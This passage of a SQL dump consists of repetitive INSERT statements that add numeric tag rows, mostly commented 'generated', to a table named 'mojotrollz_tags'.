(`id`, `table`, `type`, `value`, `comment`) VALUES (3345, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3345, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3346, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3346, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3346, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3346, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3346, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3346, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3347, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3347, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3347, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3347, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3347, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3347, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3348, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3348, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3348, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3348, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3348, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3348, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3349, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3349, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3349, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3349, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3349, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3349, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3350, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3350, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3350, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3350, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3350, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3350, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3351, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3351, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3351, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3351, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3351, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3351, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3352, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3352, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3352, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3352, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3352, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3352, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3353, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3353, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3353, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3353, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3353, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3353, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3354, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3354, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3354, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3354, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3354, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3354, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3355, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3355, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3355, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3355, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3355, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3355, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3356, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3356, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3356, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3356, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3356, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3356, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3357, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3357, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3357, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3357, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3357, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3357, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3358, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3358, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3358, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3358, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3358, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3358, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3359, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3359, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3359, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3359, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3359, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3359, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3360, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3360, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3360, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3360, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3360, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3360, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3361, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3361, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3361, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3361, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3361, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3361, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3362, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3362, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3362, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3362, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3362, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3362, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3363, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3363, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3363, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3363, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3363, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3363, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3364, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3364, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3364, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3364, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3364, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3364, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3365, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3365, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3365, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3365, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3365, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3365, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3366, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3366, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3366, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3366, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3366, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3366, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3367, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3367, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3367, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3367, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3367, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3367, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3368, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3368, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3368, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3368, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3368, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3368, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3369, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3369, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3369, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3369, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3369, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3369, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3370, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3370, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3370, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3370, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3370, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3370, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3371, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3371, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3371, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3371, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3371, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3371, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3372, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3372, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3372, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3372, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3372, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3372, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3373, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3373, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3373, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3373, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3373, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3373, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3374, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3374, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3375, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3375, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3376, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3376, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3377, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3377, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3378, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3378, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3379, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3379, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3379, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3379, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3379, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3380, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3380, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3380, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3380, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3380, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3381, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3381, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3382, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3382, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3383, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3383, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3384, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3384, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3385, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3385, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3386, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3386, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3387, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3387, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3388, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3388, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3389, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3389, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3389, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3389, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3389, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3390, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3390, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3390, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3390, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3390, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3391, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3391, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3391, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3391, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3391, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3392, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3392, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3393, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3393, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3394, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3394, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3394, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3394, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3394, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3395, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3396, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3396, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3397, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3397, 1, 2, 17, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3397, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3397, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3397, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3398, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3398, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3399, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (3399, 1, 2, 1637, NULL); INSERT INTO 